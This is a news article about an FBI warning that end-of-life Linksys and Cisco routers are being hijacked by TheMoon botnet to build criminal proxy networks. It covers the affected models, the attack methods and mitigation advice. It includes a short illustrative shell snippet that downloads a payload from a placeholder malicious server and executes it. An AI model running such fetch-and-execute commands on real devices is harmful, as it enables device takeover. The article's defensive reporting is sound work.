The Federal Bureau of Investigation (FBI) has issued a critical public service announcement, highlighting that cybercriminals are actively exploiting outdated routers to establish extensive proxy networks for concealing their illicit activities. This development underscores the pressing need for individuals and organizations to assess and upgrade their network infrastructure to mitigate potential security risks.
Targeted Router Models and Associated Risks
The FBI’s recent FLASH report identifies thirteen specific router models, primarily older Linksys devices sold under the Cisco brand, that are currently being targeted:
– Linksys E1200, E2500, E3200
– Cisco Linksys E1000, E1500, E1550, E4200, WRT610N
– Cradlepoint E300, E100
– Cisco M10
– Linksys WRT320N, WRT310N
These models, many of which date back to 2010 or earlier, no longer receive software updates from their manufacturers. This lack of support renders them vulnerable to exploitation by cyber actors who can leverage known vulnerabilities to compromise these devices.
TheMoon Malware Botnet: A Resurgent Threat
A significant factor in these attacks is the resurgence of TheMoon malware botnet, first discovered in 2014. This sophisticated malware does not require authentication to infect routers. Instead, it scans for open ports, sends malicious commands, and awaits instructions from command-and-control servers operated by hackers.
Once installed, TheMoon deploys a payload named .nttpd, which creates a process identifier (PID) file with a version number (currently 26). It then establishes iptables rules to drop incoming TCP traffic on ports 8080 and 80 while allowing traffic from specific IP ranges. This effectively secures the compromised device from external interference while maintaining attacker control.
Implications of Compromised Routers
The FBI has linked these compromised routers to services like Anyproxy and 5Socks, which were recently seized by authorities. These services sold access to the hijacked devices as proxy networks, allowing criminals to mask their true IP addresses.
By routing their internet traffic through these compromised routers, cybercriminals can conduct various illicit activities, including:
– Cryptocurrency theft
– Fraudulent transactions
– Accessing illegal services
This anonymity makes it challenging for law enforcement agencies to trace and apprehend the perpetrators.
Technical Exploitation Methods
Attackers exploit vulnerabilities in outdated firmware or brute-force weak credentials to gain access to these routers. For instance, the Seowon SLR-120 router vulnerability (CVE-2020-17456) allows unauthenticated remote code execution through simple POST requests to the router’s system_log.cgi endpoint.
Once compromised, the malware often uses code similar to:
“`
wget http://malicious-server.com/payload -O /tmp/payload
chmod +x /tmp/payload
/tmp/payload
“`
These commands download and execute the malicious payload that establishes persistent control over the device.
Recommendations for Mitigation
To defend against these attacks, the FBI recommends the following actions:
1. Replace End-of-Life Routers: Immediately replace outdated routers with newer, supported models that receive regular firmware updates.
2. Apply Firmware and Security Updates: Ensure that all available firmware and security updates are promptly applied to network devices.
3. Disable Remote Administration: Turn off remote administration features through router settings to reduce exposure to external threats.
4. Implement Strong, Unique Passwords: Use robust passwords (16-64 characters) for router access and change them regularly.
5. Regularly Reboot Routers: Reboot routers periodically to clear temporary malware that may reside in memory.
Signs of Compromise
Be vigilant for indicators that a router may be compromised, such as:
– Overheating
– Unexpected changes in settings
– Intermittent connectivity issues
If any of these signs are observed, it is crucial to take immediate action to secure the network.
Broader Context: The Growing Threat to End-of-Life Routers
The exploitation of end-of-life routers is not an isolated incident. Various manufacturers have reported similar issues:
– Zyxel: In February 2025, Zyxel confirmed that multiple end-of-life products were vulnerable to actively exploited flaws. The company advised users to replace these devices with newer models for optimal protection. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/zyxel-wont-patch-newly-exploited-flaws-in-end-of-life-routers/?utm_source=openai))
– Cisco: In January 2023, Cisco disclosed that over 19,000 end-of-life VPN routers were exposed to remote command execution attacks. The company recommended disabling remote management and blocking specific ports as mitigation measures. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/over-19-000-end-of-life-cisco-routers-exposed-to-rce-attacks/?utm_source=openai))
– D-Link: In November 2024, D-Link urged customers to retire end-of-life VPN routers impacted by a critical unauthenticated remote code execution vulnerability. The company emphasized that no security updates would be released for these devices. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/d-link-urges-users-to-retire-vpn-routers-impacted-by-unfixed-rce-flaw/?utm_source=openai))
These instances highlight a recurring pattern where outdated networking equipment becomes a prime target for cybercriminals. The lack of manufacturer support and security updates for end-of-life devices creates significant vulnerabilities that can be exploited for various malicious purposes.
Conclusion
The FBI’s warning serves as a stark reminder of the critical importance of maintaining up-to-date network infrastructure. Outdated routers not only pose a risk to individual users but also contribute to broader cybersecurity threats when compromised. By proactively replacing end-of-life devices and adhering to recommended security practices, individuals and organizations can significantly reduce their exposure to these evolving cyber threats.
